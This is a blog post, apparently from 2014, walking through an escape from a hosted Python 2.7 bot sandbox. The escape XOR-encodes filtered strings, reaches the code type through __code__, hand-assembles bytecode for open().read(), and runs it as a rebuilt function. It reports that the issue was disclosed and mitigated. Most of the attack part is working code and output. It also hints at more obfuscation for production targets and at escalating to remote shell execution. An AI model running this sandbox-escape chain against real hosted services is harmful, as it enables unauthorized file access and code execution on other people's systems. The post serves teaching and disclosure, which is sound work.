Saturday, September 6, 2014

Bypassing a python sandbox by abusing code objects

A while ago, I stumbled upon a service that let you write python-bots to interact with a number of external services. The basic idea was that you only had to worry about your logic, and they would provide a wrapper around APIs and take care of hosting the bot for a monthly fee.

Python "jail" or sandbox escapes are fairly common in CTFs, and I knew that there are all sorts of "magical" ways of doing things in python, so I decided to poke around a bit. Sure enough, I found a way of circumventing the sandbox and getting (kind of) arbitrary python to run. I've since talked to the founder about this, and they've taken steps to mitigate the damage one could do (specifically, virtualization is used to protect the host system), so I thought I'd talk about some real world python-chaos :). With the level of access I had, I'm fairly sure it was possible to get a shell, and from there, who knows...

The remainder of this post will describe the process of breaking out of the sandbox they set up. Everything was written/tested on python 2.7.6.

At face value, the service was stripped of most dangerous components fairly well:
  • "Fun" modules could not be imported (sys, os, etc)
  • "Fun" keywords/functions got your script thrown out (exec, open(), read(), compile(), etc)
  • "Fun" attributes, nope! (myfunc.func_code)
  •  Fun stuff couldn't even be in static strings! (Annoying, but not really that important). 
The last point was the easiest to get around. Just send up a list of xor'd values, and dynamically build whatever string you need.
str1 = [30, 30, 35, 52, 40, 45, 53, 40, 47, 50, 30, 30]
for i in range(0,len(str1)):
        str1[i] = chr(str1[i] ^ 0x41)
str1 = ''.join(str1)
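The encoded list has to be produced somewhere outside the sandbox first. Here is a minimal sketch of that step, assuming the same single-byte key 0x41 as above; the helper names xor_encode and xor_decode are made up for this illustration. Decoding the list from the snippet above shows that it hides the string "__builtins__".

```python
KEY = 0x41  # same single-byte XOR key as in the snippet above

def xor_encode(text, key=KEY):
    """Turn a string into a list of XOR'd integers (done offline)."""
    return [ord(ch) ^ key for ch in text]

def xor_decode(values, key=KEY):
    """Rebuild the original string from the XOR'd integers."""
    return ''.join(chr(v ^ key) for v in values)

# The list from the post, decoded back into the string it hides.
encoded = [30, 30, 35, 52, 40, 45, 53, 40, 47, 50, 30, 30]
decoded = xor_decode(encoded)
print(decoded)
```

Running xor_encode on any other blocked string gives a list that can be pasted into a script in the same way.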
That gets us around most of the basic string-matching, but it still doesn't let us do anything interesting. The rest of the exploit relies on code objects. If you're not familiar with them, this is a great overview.

So, normally, python allows you to access all the guts of functions. A function is basically a wrapper for a code-object, and (as the name implies) you can access and modify these objects as you like. The python interpreter acts as a sort of VM, fetching and executing bytecode found inside code-objects. Python bytecode is assembly-ish. You can take a look here if you want to play around.

At first, it's tempting to just try directly modifying a dummy function's bytecode. However, that requires accessing the "func_code" member, which is explicitly blocked. Additionally, just modifying bytecode wouldn't be enough. Fortunately, it /was/ possible to get access to the code-object type through "__code__", an alias for "func_code" that was not blocked.
cdbj = type(myfunc.__code__)
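To see what that line actually returns, here is a small sketch you can run locally. It shows that type() of any function's __code__ is the interpreter's code type, the same object the standard types module exposes as CodeType. The function myfunc is just a stand-in, and the snippet should run unchanged on Python 2.7 and Python 3.

```python
import types

def myfunc():
    pass

# type() hands back the class itself, not an instance of it.
code_type = type(myfunc.__code__)
function_type = type(myfunc)

print(code_type is types.CodeType)
print(function_type is types.FunctionType)
```

Getting the type this way avoids importing anything, which matters when the types module is one of the things the sandbox refuses to import.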

Now that we have the code type, we can build a code object of our own, fill it in, and slide it into an empty function. The question at this point is: what do we fill it in with?
>>> dir(f.__code__)
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__',
'__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__',
'__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__',
'__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename',
'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals',
'co_stacksize', 'co_varnames']

So, that looks a bit intimidating, but really, we're only interested in a few of these. Specifically, I used:
  • co_code: string of raw compiled bytecode
  • co_consts: tuple of constants used in the bytecode 
  • co_names: tuple of names referenced by the bytecode (globals and attributes such as open and read; local variables live in co_varnames)
  Most of the others are documented here if you want to take a look. 
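A quick way to get a feel for these three fields is to print them for an ordinary function. This is only a sketch: the exact contents of co_consts and co_code depend on the interpreter version, so treat the printed values as illustrative. Only the overall shape (names in one tuple, constants in another, raw bytes in co_code) carries over to the 2.7 setup used in this post.

```python
def read():
    return open("./", 'r').read()

code = read.__code__
names = code.co_names      # global and attribute names the bytecode refers to
consts = code.co_consts    # literal values the bytecode loads
raw = code.co_code         # the raw bytecode string

print(names)
print(consts)
print(len(raw))
```

Note that nothing here calls read(); the code object can be inspected without running it.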
I had an info-leak that gave me the path of an interesting file, so I wanted my bytecode to basically do: open(<filename>).read().

You can inspect bytecode in a user-friendly-ish way by using the dis module. This makes it easier to understand the fields we'll be filling in.

import dis
def read():
        return open("./",'r').read()
dis.dis(read)           #Print the disassembly shown below

 28           0 LOAD_GLOBAL              0 (open)
              3 LOAD_CONST               1 ('./')
              6 LOAD_CONST               2 ('r')
              9 CALL_FUNCTION            2
             12 LOAD_ATTR                1 (read)
             15 CALL_FUNCTION            0
             18 RETURN_VALUE        
Now, to actually access the bytecode that results in this:
bytecode = read.__code__.co_code
print bytecode.encode('hex')
>>> 7400006401006402008302006a010083000053
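To connect that hex string back to the dis listing, here is a tiny hand-rolled decoder. It is a sketch under two assumptions: the opcode table is a hand-copied subset of the Python 2.7 opcodes (only the five used here), and the bytecode uses the 2.7 layout where any opcode numbered 90 or higher is followed by a two-byte little-endian argument. The function name decode_py27 is invented for this example. It only decodes bytes, so it runs on any Python version.

```python
import binascii

# Hand-copied subset of Python 2.7 opcode numbers (not the full table).
PY27_OPNAMES = {
    0x53: "RETURN_VALUE",
    0x64: "LOAD_CONST",
    0x6a: "LOAD_ATTR",
    0x74: "LOAD_GLOBAL",
    0x83: "CALL_FUNCTION",
}
HAVE_ARGUMENT = 90  # in 2.7, opcodes >= 90 carry a 2-byte argument

def decode_py27(hex_bytecode):
    """Return a list of (offset, opname, argument) tuples."""
    raw = bytearray(binascii.unhexlify(hex_bytecode))
    offset = 0
    instructions = []
    while offset < len(raw):
        opcode = raw[offset]
        name = PY27_OPNAMES.get(opcode, "UNKNOWN_%d" % opcode)
        if opcode >= HAVE_ARGUMENT:
            # Argument is stored little-endian in the next two bytes.
            arg = raw[offset + 1] | (raw[offset + 2] << 8)
            instructions.append((offset, name, arg))
            offset += 3
        else:
            instructions.append((offset, name, None))
            offset += 1
    return instructions

listing = decode_py27("7400006401006402008302006a010083000053")
for offset, name, arg in listing:
    print("%2d %-14s %s" % (offset, name, arg))
```

The offsets and arguments line up with the dis output: the arguments of LOAD_GLOBAL and LOAD_ATTR are indexes into co_names, and those of LOAD_CONST are indexes into co_consts.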
This gives us all the necessary pieces to create our code object. We can slide in our values like this:
code = type(myfunc.__code__)        #Get a Code Object
bytecode = "7400006401006402008302006a010083000053".decode('hex')   #Get our bytecode
filename = "./"             #Set our filename
consts = (None,filename,'r')      #Set up our constants
names = ('open','read')           #Set up our names
#Slide our values into the code object.
codeobj = code(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ()) 
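That long positional call is easier to read with labels attached. The sketch below pairs each value with the parameter name from the Python 2.7 code constructor, which takes argcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, firstlineno, lnotab, and optionally freevars and cellvars. It builds no code object, it only labels the arguments, so it runs on any Python version. The variable names are chosen for this illustration.

```python
import binascii

# Parameter order of the Python 2.7 code constructor.
PY27_CODE_FIELDS = (
    "argcount", "nlocals", "stacksize", "flags", "codestring",
    "constants", "names", "varnames", "filename", "name",
    "firstlineno", "lnotab", "freevars", "cellvars",
)

bytecode = binascii.unhexlify("7400006401006402008302006a010083000053")
consts = (None, "./", "r")
names = ("open", "read")

# The same values, in the same order, as the call in the post.
values = (0, 0, 3, 64, bytecode, consts, names, (),
          "noname", "<module>", 1, "", (), ())

labelled = dict(zip(PY27_CODE_FIELDS, values))
for field in PY27_CODE_FIELDS:
    print("%-12s %r" % (field, labelled[field]))
```

Two of the numbers deserve a note. The stacksize of 3 covers the deepest point of the evaluation stack, when open, the filename and 'r' are all pushed before the first call. The flags value 64 is 0x40, which is CO_NOFREE, meaning the code uses no free or cell variables.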
Great! Now we've created a code object with our desired functionality, without using anything that would trigger alerts. The only thing left to do is to find a way to execute it! Thankfully, functions in python are quite malleable. You can read about all their attributes here.
First, we start off with an empty, "dummy" function, and obtain a variable of type "function" that we can modify.
def f():
        pass                #Empty body; we only need the function's type
function = type(f)
Turns out there's one more major thing we need to do before we can slide in our code object. Python functions have a __globals__ attribute. This is described in the python documentation as: 

A reference to the dictionary that holds the function’s global variables — the global namespace of the module in which the function was defined.
Since the only thing we're worried about in our function is using the open() and read() built-in calls, we can create this dictionary easily enough.
import __builtin__
mydict = {}
mydict["__builtins__"] = __builtin__
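To see why that dictionary matters, the sketch below builds two functions from the same code object, one whose globals point at the real builtins module and one whose "__builtins__" entry is an empty dict. The names probe, with_builtins and restricted are invented for this example, and the import is wrapped so it works on both Python 2 (where the module is __builtin__) and Python 3 (where it is builtins).

```python
try:
    import builtins                    # Python 3 name
except ImportError:
    import __builtin__ as builtins     # Python 2 name

def probe():
    return len("abc")

function_type = type(probe)

# Same code object, two different global namespaces.
with_builtins = function_type(probe.__code__, {"__builtins__": builtins})
restricted = function_type(probe.__code__, {"__builtins__": {}})

ok_result = with_builtins()

try:
    restricted()
    lookup_failed = False
except NameError:
    # len cannot be resolved: it is in neither globals nor builtins.
    lookup_failed = True

print(ok_result)
print(lookup_failed)
```

A global name lookup checks the function's globals first and then whatever "__builtins__" points to, so a function built by hand only sees open() if that entry is supplied.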
At this point, the only thing left to do is put all the pieces together. Using the "function" variable we created before:
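newfunc = function(codeobj, mydict, None, None, None)   #Wrap our code object in a function
print newfunc()         #Call it to run the bytecode and print the file contents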
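For anyone trying this on a modern interpreter, here is a rough Python 3 analogue of the whole chain. It is a sketch, not the original exploit: Python 3 bytecode and the code constructor differ from 2.7, so instead of hand-writing bytecode it borrows the code object of a template function and swaps one constant using code.replace(), which assumes Python 3.8 or newer. The names template, patched and rebuilt, the PLACEHOLDER string and the temporary file are all made up for the demonstration.

```python
import builtins
import os
import tempfile

def template():
    return open("PLACEHOLDER", "r").read()

# Create a throwaway file to stand in for the "interesting" one.
fd, path = tempfile.mkstemp()
with os.fdopen(fd, "w") as handle:
    handle.write("secret contents")

# Swap the placeholder constant for the real path (Python 3.8+).
code = template.__code__
new_consts = tuple(path if c == "PLACEHOLDER" else c for c in code.co_consts)
patched = code.replace(co_consts=new_consts)

# Wrap the patched code object in a fresh function with its own globals.
function_type = type(template)
rebuilt = function_type(patched, {"__builtins__": builtins}, None, None, None)

contents = rebuilt()
os.remove(path)
print(contents)
```

The shape is the same as in the 2.7 version: obtain a code object, control its constants, and hand it to the function type together with a globals dictionary that exposes the builtins.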

So, in conclusion, we've created a code object and devised a way of executing it. Obviously, blocking a few more keywords would stop this particular attack, but it highlights the difficulty of getting this sort of thing right.

For some ideas on taking this to the next level, take a look at this CTF writeup that discusses using a read/write primitive to obtain shell-level remote code execution on the host system. Certainly something to keep in mind.

Actually getting this to execute on similar production environments will probably require a bit more obfuscation/creativity. However, I've put together an example script that ties together all the steps explained here into a simple package that you should be able to execute and play with locally. Enjoy! :)